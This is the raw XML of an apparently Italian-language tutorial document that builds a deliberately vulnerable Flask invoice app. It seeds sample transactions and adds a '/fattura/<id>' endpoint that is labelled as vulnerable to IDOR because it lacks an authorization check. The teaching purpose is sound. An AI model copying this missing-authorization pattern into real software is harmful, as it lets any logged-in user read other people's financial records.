      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            data TEXT NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            FOREIGN KEY (utente_id) REFERENCES utenti(id)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    fatture_test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># (utente_id, descrizione, importo, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Bonifico stipendio Anthropic SRL"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3200.00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2025-09-30"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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Pagamento abbonamento sicurezza"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">89.00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2025-10-05"</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"Bonifico stipendio FIAT-Stellantis"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2150.00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2025-09-27"</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"Bolletta gas Edison"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">134.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2025-10-08"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Rata mutuo INTESA SP"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">780.00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2025-10-10"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"Vendita azioni ENEL"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">12500.00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2025-10-01"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Tassa successione"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2400.00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2025-10-12"</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"Pensione INPS"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,                       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">980.00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2025-09-28"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Pagamento RC Auto Allianz"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">512.00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2025-10-02"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.executemany(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT OR IGNORE INTO fatture (utente_id, descrizione, importo, data) "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"VALUES (?, ?, ?, ?)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        fatture_test</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Modifica 2 — aggiungi un endpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">/fattura/&lt;id&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Inseriscilo prima di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">if __name__ == "__main__":</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># DETTAGLIO FATTURA — VULNERABILE A IDOR</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/fattura/&lt;int:fattura_id&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fattura(fattura_id):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ Controllo di autenticazione</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ MANCA il controllo di autorizzazione!</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SELECT fatture.id, fatture.descrizione, fatture.importo, fatture.data,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">               utenti.username</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM fatture JOIN utenti ON fatture.utente_id = utenti.id</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE fatture.id = ?</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, (fattura_id,))</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;h2&gt;Fattura non trovata&lt;/h2&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">404</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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;html&gt;&lt;head&gt;&lt;title&gt;Fattura </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> r[0] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;body&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;h1&gt;Fattura n° </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> r[0] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;p&gt;&lt;b&gt;Intestatario:&lt;/b&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> r[4] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;p&gt;&lt;b&gt;Data:&lt;/b&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> r[3] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;p&gt;&lt;b&gt;Descrizione:&lt;/b&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> r[1] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;p&gt;&lt;b&gt;Importo:&lt;/b&gt; </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">               {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f r[2] &gt;= 0 %}+{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ndif %}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">%.2f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"|format(r[2]) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> €&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;hr&gt;&lt;a href="/dashboard"&gt;⬅ Dashboard&lt;/a&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">riga)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Modifica 3 — aggiungi una lista delle proprie fatture nella dashboard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sostituisci la funzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dashboard()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con questa:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/dashboard"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dashboard():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"SELECT id, descrizione, importo, data FROM fatture "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"WHERE utente_id = ? ORDER BY data DESC"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                (session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">],))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    mie_fatture </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
